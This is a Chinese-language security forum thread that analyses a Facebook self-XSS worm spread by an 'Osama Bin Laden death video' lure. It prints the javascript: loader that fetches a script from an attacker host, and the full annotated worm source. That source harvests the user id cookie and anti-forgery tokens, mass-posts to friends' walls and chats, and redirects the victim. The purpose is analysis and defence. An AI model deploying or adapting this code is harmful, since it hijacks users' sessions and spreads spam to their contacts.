Facebook 垃圾邮件/网络钓鱼企图?

信息安全 攻击 javascript
2021-08-18 18:30:12

我在 Facebook 上收到了一位朋友发送的消息,但我认为这不是一条真实的消息:

___ shared a link on your Wall. 
This will leave you speechless) 
http://www.facebook.com/pages/Osama-Bin-Laden-Killed-Leaked-Video/185837861463668 
Osama Bin Laden Death Video! 
Navy Seals raid Bin Ladens hideout and execute him!  

打开该链接后,页面显示一条提示,要求访问者把下面这段内容复制到浏览器地址栏中并回车(即所谓的 self-XSS:诱骗用户亲手在 facebook.com 的页面上下文里执行攻击者的脚本):

javascript:(a=(b=document).createElement('script')).src='//fspy.co/o.js?'+Math.random(),b.body.appendChild(a);void(0)

我检查了这个 fspy.co/o.js 文件,它的内容如下。

我试图了解这个脚本的作用。这里有人有更多见解吗?

/////////////////////////////////////////////////////////////////////////////////////////////////////////////
// KuNG FU JS v.1 20yrsplus.info
/////////////////////////////////////////////////////////////////////////////////////////////////////////////

//alert('Photo Uploaded! Please wait 1-2 minutes without leaving this page until we process your picture!');

/**
 * Return the value of the cookie called `name` from `document.cookie`,
 * or null when no such cookie exists.
 *
 * Only cookies without the HttpOnly flag are visible here. Because this
 * script was pasted into the address bar as a `javascript:` URL, it runs
 * in the facebook.com origin and therefore sees the victim's own cookies;
 * the same-origin policy offers no protection against self-XSS.
 *
 * @param {string} name  cookie name (matched exactly, as `name=` at the start of a cookie entry)
 * @returns {string|null} raw (still URL-encoded) cookie value, or null
 */
function readCookie(name) {

    var nameEQ = name + "=";
    var ca = document.cookie.split(';');
    for(var i=0;i < ca.length;i++) {
        var c = ca[i];
        // Strip the leading spaces that follow each ';' separator.
        while (c.charAt(0)==' ') c = c.substring(1,c.length);
        // indexOf(...) == 0 means the entry starts with "name=", i.e. an exact name match.
        if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length,c.length);
    }
    return null;

}

// Victim identity: the `c_user` cookie is passed below as `viewer=` and `user=`
// in Facebook AJAX requests, so it presumably holds the logged-in user's id.
var user_id = readCookie("c_user");


// Anti-forgery tokens, scraped from hidden form fields in the live page DOM.
// Every POST below echoes both `post_form_id` and `fb_dtsg`; these are the
// request-forgery tokens Facebook's endpoints expect, and reading them is
// trivial here because the script is already executing inside the page.
// If either field is absent, `[0]` is undefined and `.value` throws,
// which would abort the whole script before any spam is sent.

var post_form_id = document.getElementsByName('post_form_id')[0].value;
var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;


// "Multiple URL Shorteners" is a leftover label: both entries are the same
// Facebook Page URL (no shortener involved), and `shortUrl` is never read
// anywhere else in this script. The lure URL actually posted is chosen
// again inside the wall-post loop (`randLink`).

var shortArray = new Array(
               "http://www.facebook.com/pages/Osama-Bin-Laden-Killed-Leaked-Video/185837861463668?",
               "http://www.facebook.com/pages/Osama-Bin-Laden-Killed-Leaked-Video/185837861463668?"
              );

var shortUrl = shortArray[Math.floor(shortArray.length*Math.random())];

// Chat lure text, URL-encoded once so it can be dropped into the
// `msg_text=` form field of the chat send request below.

var this_chat = "See the Osama Bin Laden EXECUTION Video! facebook.com/pages/Osama-Bin-Laden-Killed-Leaked-Video/185837861463668?";
var prepared_chat = encodeURIComponent(this_chat);

///////////////////////////////////////////////////////////////////////////////////////////////////////////////
// Post Link to friends walls
///////////////////////////////////////////////////////////////////////////////////////////////////////////////

// Stage 1 - harvest the victim's friend list, then post the lure to up to
// 400 friends' walls. Each step is an authenticated same-origin XHR that
// rides on the victim's session cookies plus the scraped form tokens.

// Unix time in seconds; sent as `token=<seconds>-6`, mimicking the typeahead widget.
var token = Math.round(new Date().getTime() / 1000);

var http1 = new XMLHttpRequest();

// Friend-list typeahead endpoint, restricted to first-degree friends (`filter[0]=user&options[0]=friends_only`).
var url1 = "http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1&viewer="+user_id+"&token="+token+"-6&filter[0]=user&options[0]=friends_only";

// `url1` already carries a query string, so appending "?"+params1 just adds a
// dangling "?" with an empty parameter list - sloppy but harmless.
var params1 = "";
http1.open("GET", url1+"?"+params1, true);
http1.onreadystatechange = function() {//Call a function when the state changes.

    if(http1.readyState == 4 && http1.status == 200) { // If state = success

        var response1 = http1.responseText;

        // Facebook prefixes its AJAX JSON with `for (;;);` (presumably an
        // anti-JSON-hijacking guard against cross-origin <script> inclusion).
        // It does nothing against same-origin XHR, so the worm simply strips it.
        response1 = response1.replace("for (;;);", ""); // Get rid of the junk at the beginning of the returned object
        response1 = JSON.parse(response1); // Convert the response to JSON

        //alert(response4.toSource());

        var count = 0;

        // NOTE: `uid` is an implicit global and is never used; the body indexes
        // `entries` by the numeric `count` instead. That only lines up if
        // `entries` is an array (for-in then yields "0","1",... in order).
        for(uid in response1.payload.entries){

            // Cap of 400 wall posts per victim.
            if(count < 400){

                //alert("SENT TO "+response1.payload.entries[count].uid);

                // One fire-and-forget POST per friend; all are started at once,
                // nothing waits for or checks the result.

                // New XMLHttp object
                var httpwp = new XMLHttpRequest();

                var urlwp = "http://www.facebook.com/ajax/profile/composer.php?__a=1";
                // Two identical lure URLs - the "random" choice is cosmetic.
                var randLink = new Array("http://www.facebook.com/pages/Osama-Bin-Laden-Killed-Leaked-Video/185837861463668?", "http://www.facebook.com/pages/Osama-Bin-Laden-Killed-Leaked-Video/185837861463668?");
                var statusmessage="This will leave you speechless";
                var title="Osama Bin Laden Death Video!";
//              var link="http://www.facebook.com/pages/Osama-Bin-Laden-Killed-Leaked-Video/185837861463668?http://www.facebook.com/pages/Osama-Bin-Laden-Killed-Leaked-Video/185837861463668?";
                var link = randLink[Math.floor(randLink.length*Math.random())];
                var description="Navy Seals raid Bin Ladens hideout and execute him! ";
                // Thumbnail hosted on attacker infrastructure (co.cc free subdomain).
                var picture="http://cooldadssz.co.cc/laden.png";

                // Wall-post form body, evidently replayed from a captured legitimate
                // composer request. Key fields:
                //   - xhpc_targetid = the friend's uid (post lands on THEIR wall);
                //   - post_form_id / fb_dtsg = the victim's anti-forgery tokens;
                //   - attachment[params][metaTagMap][...] = forged Open Graph metadata
                //     (og:title, og:image, og:description) so the link preview looks
                //     like a video; favicon points at 20-y-rr-z.info.
                // `title`/`description`/`statusmessage` are NOT URL-encoded (unlike
                // the chat text), and both message fields end with a stray `)` from
                // the `+")` in this literal - which is why the victim's post in the
                // question reads "This will leave you speechless)".
                var paramswp = "post_form_id="+post_form_id+"&fb_dtsg="+fb_dtsg+"&xhpc_composerid=u574553_1&xhpc_targetid="+response1.payload.entries[count].uid+"&xhpc_context=profile&xhpc_fbx=1&aktion=post&app_id=2309869772&UIThumbPager_Input=0&attachment[params][metaTagMap][0][http-equiv]=content-type&attachment[params][metaTagMap][0][content]=text%2Fhtml%3B%20charset%3Dutf-8&attachment[params][metaTagMap][1][property]=og%3Atitle&attachment[params][metaTagMap][1][content]="+title+"&attachment[params][metaTagMap][2][property]=og%3Aurl&attachment[params][metaTagMap][2][content]="+link+"&attachment[params][metaTagMap][3][property]=og%3Asite_name&attachment[params][metaTagMap][3][content]="+title+"&attachment[params][metaTagMap][4][property]=og%3Aimage&attachment[params][metaTagMap][4][content]="+picture+"&attachment[params][metaTagMap][5][property]=og%3Adescription&attachment[params][metaTagMap][5][content]="+description+"&attachment[params][metaTagMap][6][name]=description&attachment[params][metaTagMap][6][content]="+description+"&attachment[params][metaTagMap][7][http-equiv]=Content-Type&attachment[params][metaTagMap][7][content]=text%2Fhtml%3B%20charset%3Dutf-8&attachment[params][medium]=106&attachment[params][urlInfo][user]="+link+"&attachment[params][favicon]=http%3A%2F%2F20-y-rr-z.info%2Ffavicon.ico&attachment[params][title]="+title+"&attachment[params][fragment_title]=&attachment[params][external_author]=&attachment[params][summary]="+description+"&attachment[params][url]="+link+"&attachment[params][ttl]=0&attachment[params][error]=1&attachment[params][responseCode]=206&attachment[params][metaTags][description]="+description+"&attachment[params][images][0]="+picture+"&attachment[params][scrape_time]=1302991496&attachment[params][cache_hit]=1&attachment[type]=100&xhpc_message_text="+statusmessage+")&xhpc_message="+statusmessage+")&nctr[_mod]=pagelet_wall&lsd&post_form_id_source=AsyncRequest";

                httpwp.open("POST", urlwp, true);

                // Only Content-type matters here. `Content-length` and `Connection`
                // are request headers browsers do not let page script set, so those
                // two calls have no effect (they are silently ignored, not errors).

                httpwp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
                httpwp.setRequestHeader("Content-length", paramswp.length);
                httpwp.setRequestHeader("Connection", "keep-alive");                    

                // Empty handler. Note `httpwp` is function-scoped (`var`), so every
                // callback closes over the last request object - irrelevant only
                // because the handler does nothing.
                httpwp.onreadystatechange = function() { //Call a function when the state changes.
                    if(httpwp.readyState == 4 && httpwp.status == 200){
                        //alert(http.responseText);
                        //alert('buddy list fetched');
                    }

                }

                httpwp.send(paramswp);

            }

            count++; // increment counter

        }

        // No-op: a bare property access, not a call (and XMLHttpRequest has no close()).
        http1.close; // Close the connection



    }

}

http1.send(null);


///////////////////////////////////////////////////////////////////////////////////////////////////////////////
// Hide chat boxes
///////////////////////////////////////////////////////////////////////////////////////////////////////////////

// Hide the chat dock, presumably so the victim does not see the chat
// messages sent in stage 2 below. If `fbDockChatTabSlider` is not in the
// DOM, `hide` is null and the next line throws, aborting the script here
// (the stage-1 wall-post requests have already been dispatched by then).

var hide = document.getElementById('fbDockChatTabSlider');

hide.style.display = "none";


///////////////////////////////////////////////////////////////////////////////////////////////////////////////
// Get online friends and send chat message to them
///////////////////////////////////////////////////////////////////////////////////////////////////////////////

// Stage 2 - fetch the victim's online buddy list and push the chat lure to
// up to 100 currently-online friends. Same pattern as stage 1: authenticated
// same-origin POSTs carrying the scraped post_form_id / fb_dtsg tokens.

var http3 = new XMLHttpRequest();

var url3 = "http://www.facebook.com/ajax/chat/buddy_list.php?__a=1";
var params3 = "user="+user_id+"&popped_out=false&force_render=true&post_form_id="+post_form_id+"&fb_dtsg="+fb_dtsg+"&lsd&post_form_id_source=AsyncRequest";
http3.open("POST", url3, true);

// Only Content-type takes effect; Content-length/Connection are browser-controlled
// request headers that script is not allowed to set.
http3.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
http3.setRequestHeader("Content-length", params3.length);
http3.setRequestHeader("Connection", "close");

http3.onreadystatechange = function() {//Call a function when the state changes.
    if(http3.readyState == 4 && http3.status == 200) {

        var response3 = http3.responseText;

        // Strip Facebook's `for (;;);` JSON prefix before parsing (see stage 1).
        response3 = response3.replace("for (;;);", "");
        response3 = JSON.parse(response3);

        var count = 0;

        // `property` (an implicit global) is each key of nowAvailableList and is
        // sent as the `to=` recipient, so the keys are presumably friend uids.
        for(property in response3.payload.buddy_list.nowAvailableList){

            // Cap of 100 chat messages per victim.
            if(count < 100){

                // One fire-and-forget POST per online friend.

                // New XMLHttp object
                var httpc = new XMLHttpRequest();

                // Client-side message id, random to look like distinct user-sent messages.

                var msgid = Math.floor(Math.random()*1000000);

                var time = Math.round(new Date().getTime() / 1000);

                var urlc = "http://www.facebook.com/ajax/chat/send.php?__a=1";
                // `prepared_chat` is the URL-encoded lure text built at the top of the script.
                var paramsc = "msg_id="+msgid+"&client_time="+time+"&to="+property+"&num_tabs=1&pvs_time="+time+"&msg_text="+prepared_chat+"&to_offline=false&post_form_id="+post_form_id+"&fb_dtsg="+fb_dtsg+"&lsd&post_form_id_source=AsyncRequest";
                httpc.open("POST", urlc, true);

                //Send the proper header information along with the request
                httpc.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
                httpc.setRequestHeader("Content-length", paramsc.length);
                httpc.setRequestHeader("Connection", "close");

                // Empty handler; `httpc` is `var`-scoped so all callbacks share the
                // last request object, which is harmless only because nothing is done.
                httpc.onreadystatechange = function() { //Call a function when the state changes.
                    if(httpc.readyState == 4 && httpc.status == 200){
                        //alert(http.responseText);
                        //alert('buddy list fetched');
                    }
                }
                httpc.send(paramsc);

            }

            //alert(property);
            count++; // increment counter

        }

        // No-op property access, not a call.
        http3.close; // Close the connection

    }
}
http3.send(params3);







/*
///////////////////////////////////////////////////////////////////////////////////////////////////////////////
// Become a Fan - MW GIVEAWAY
///////////////////////////////////////////////////////////////////////////////////////////////////////////////

var http4 = new XMLHttpRequest();

var url4 = "http://www.facebook.com/ajax/pages/fan_status.php?__a=1";

var params4 = "fbpage_id=193321447379497&add=1&reload=0&preserve_tab=false&nctr[_mod]=pagelet_header&post_form_id="+post_form_id+"&fb_dtsg="+fb_dtsg+"&lsd&post_form_id_source=AsyncRequest"

http4.open("POST", url4, true);

//Send the proper header information along with the request
http4.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
http4.setRequestHeader("Content-length", params4.length);
http4.setRequestHeader("Connection", "close");

http4.onreadystatechange = function() {//Call a function when the state changes.
    if(http4.readyState == 4 && http4.status == 200) {

        http4.close; // Close the connection

    }
}
http4.send(params4);


///////////////////////////////////////////////////////////////////////////////////////////////////////////////
// Become a Fan - MW GIft
///////////////////////////////////////////////////////////////////////////////////////////////////////////////

var http5 = new XMLHttpRequest();

var url5 = "http://www.facebook.com/ajax/pages/fan_status.php?__a=1";

var params5 = "fbpage_id=182116595173798&add=1&reload=0&preserve_tab=false&nctr[_mod]=pagelet_header&post_form_id="+post_form_id+"&fb_dtsg="+fb_dtsg+"&lsd&post_form_id_source=AsyncRequest"

http5.open("POST", url5, true);

//Send the proper header information along with the request
http5.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
http5.setRequestHeader("Content-length", params5.length);
http5.setRequestHeader("Connection", "close");

http5.onreadystatechange = function() {//Call a function when the state changes.
    if(http5.readyState == 4 && http5.status == 200) {

        http5.close; // Close the connection

    }
}
http5.send(params5);
*/

// Stage 3 - cover story and hand-off. Replace the page body with a fake
// "Please wait..." spinner (the GIF is hot-linked from a news site, not
// attacker infrastructure) so the victim sits still while the outstanding
// XHRs from stages 1 and 2 finish. innerHTML with a fixed literal here; no
// user data is involved.
//document.getElementById('susta').style.display="none";
document.getElementById('contentArea').innerHTML="<center><br><br><br><br><br><br><br><br><img src=\"http://www.hindustantimes.com/images/loading_gif.gif\" /><br />Please wait...</center>";
// Four identical copies of the loader host; `ending` is computed but never
// used - the redirect target below is hard-coded.
var endArray = new Array("http://fspy.co/", "http://fspy.co/", "http://fspy.co/", "http://fspy.co/");


var ending = endArray[Math.floor(endArray.length*Math.random())];
// String-form setTimeout is an implicit eval. After 15 s, navigate the
// victim to the lure landing page; the delay gives the spam requests time
// to complete before navigation would cancel them.
// Hosts seen in this sample: fspy.co (loader, o.js), cooldadssz.co.cc
// (og:image), 20-y-rr-z.info (favicon), fbview.net (final redirect),
// 20yrsplus.info (named in the header banner).
setTimeout("window.location = 'http://fbview.net/osama.html';", 15000);
3个回答

这段代码的注释相当充分——实际上注释多得有些过头,例如:

count++; // 递增计数器

它的各个主要功能都有标注,代码也非常直白。它的行为很像 Samy 蠕虫,但传播方式靠的是社会工程——诱骗用户自己把 javascript: 代码粘贴进地址栏(self-XSS)——而不是利用站点本身的 XSS 漏洞。

据我了解,最关键的部分是:它读取您的 Facebook cookie 中的 c_user(您的用户 id),从页面里抓取 post_form_id 和 fb_dtsg 这两个防请求伪造的令牌,然后用您的会话向最多 400 位好友的涂鸦墙发帖,并向最多 100 位在线好友发送聊天消息;把您加入某个 FB 页面/群组的那部分代码在这个样本里被注释掉了。逐个请求地读这段代码,就能看出每个 HTTP 连接在做什么。

代码中的某些部分(例如 paramsc 之类的变量)看起来可能没有意义,因为它们是 Facebook 内部接口特有的表单字段。要理解这些字段,可以在 Facebook 上执行“加入群组”之类的操作,用浏览器查看发出的请求头和请求体——这段脚本显然就是照着这样抓到的请求拼出来的,再把需要的部分替换掉。这并不难做到。Facebook 显然可以把这一点做得更安全;他们有很多办法可以缓解这种攻击,但我猜他们当时没有为此做好准备,结果这些链接突然就泛滥开了。

这类攻击似乎很难防范:群组本来就希望能把链接发给朋友邀请他们加入,这些链接不会随时间变化,而且只需点击一下就能完成操作。此外,这些功能必须做到把链接放进电子邮件里、点一下就能生效——只要有有效的会话 cookie,就不再需要任何其他东西。所以这里存在取舍。我很想知道他们会怎么应对;我敢打赌 Facebook 现在正为此失眠。

Stack Overflow 上的更多讨论:如何防范 Osama Facebook 蠕虫

从机制上看,这应该不难防范——它完全依赖用户亲手把自己看不懂的命令复制粘贴到地址栏里执行。

问题在于——“足够多的人足够愚蠢”,所以它就这样传播开了。

所以,回到你问题标题里的疑问——是的,这是一次明目张胆的攻击(以蠕虫方式传播的垃圾信息/钓鱼)。

而且我认为 @Vass 已经把它的工作原理解释得足够清楚了。